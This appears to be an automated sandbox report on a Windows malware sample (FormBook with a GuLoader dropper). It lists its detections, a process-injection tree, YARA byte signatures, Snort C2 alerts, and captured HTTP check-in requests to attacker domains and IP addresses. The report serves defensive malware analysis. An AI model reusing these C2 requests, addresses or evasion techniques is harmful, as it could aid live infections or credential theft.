Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION.exe

Overview

General Information

Sample Name:QUOTATION.exe
Analysis ID:830630
MD5:9f23ccacd955392c62b1b5d4be4ed690
SHA1:d7c9c869add707b5b41a1f11f5c82bba94eabbd7
SHA256:7b8d50ac67b2f0de5e35909025cc1a8d15f5edd18675878c7aaa31e3fe83a9fd
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • QUOTATION.exe (PID: 948 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 9F23CCACD955392C62B1B5D4BE4ED690)
    • QUOTATION.exe (PID: 7268 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 9F23CCACD955392C62B1B5D4BE4ED690)
      • explorer.exe (PID: 4812 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • help.exe (PID: 5688 cmdline: C:\Windows\SysWOW64\help.exe MD5: DD40774E56D4C44B81F2DFA059285E75)
          • firefox.exe (PID: 7032 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169JoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1f0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 14 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.11.202.57.90.1649909802031412 03/20/23-15:24:14.014424
          SID:2031412
          Source Port:49909
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20199.192.26.3549877802031449 03/20/23-15:21:09.812328
          SID:2031449
          Source Port:49877
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2034.117.168.23349886802031453 03/20/23-15:21:43.461874
          SID:2031453
          Source Port:49886
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.202.57.90.1649909802031453 03/20/23-15:24:14.014424
          SID:2031453
          Source Port:49909
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20199.192.26.3549877802031453 03/20/23-15:21:09.812328
          SID:2031453
          Source Port:49877
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2034.117.168.23349886802031449 03/20/23-15:21:43.461874
          SID:2031449
          Source Port:49886
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.2034.117.168.23349886802031412 03/20/23-15:21:43.461874
          SID:2031412
          Source Port:49886
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.202.57.90.1649909802031449 03/20/23-15:24:14.014424
          SID:2031449
          Source Port:49909
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.11.20199.192.26.3549877802031412 03/20/23-15:21:09.812328
          SID:2031412
          Source Port:49877
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: QUOTATION.exeVirustotal: Detection: 28%Perma Link
          Source: QUOTATION.exeReversingLabs: Detection: 33%
          Yara detected FormBook
          Source: Yara matchFile source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 10.2.help.exe.3d73814.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 9.2.explorer.exe.142b3814.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 11.2.firefox.exe.5ce3814.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: QUOTATION.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49835 version: TLS 1.2
          Source: QUOTATION.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
          Source: Binary string: maintenanceservice.pdb@ 0%P% source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
          Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
          Source: Binary string: mshtml.pdb source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
          Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000008.00000002.4328211307.00000000336F0000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4186562226.0000000033393000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4192719473.0000000033544000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4285759564.0000000003861000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003B3D000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8000718491.0000000003A10000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4280954827.00000000036B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: help.pdbGCTL source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
          Source: Binary string: help.pdb source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: firefox.pdb source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_004062DD FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData
          Source: C:\Users\user\Desktop\QUOTATION.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 91.184.0.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.194.145.38 80
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.26.35 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.217 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.56.79.23 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.215.156.6 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.45.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.83.160.9 80
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80
          Source: C:\Windows\explorer.exeNetwork Connect: 88.212.206.251 80
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49877 -> 199.192.26.35:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49886 -> 34.117.168.233:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 2.57.90.16:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.dexmart.xyz
          Yara detected Generic Downloader
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll, type: DROPPED
          Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.192.26.35 199.192.26.35
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:19:18 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 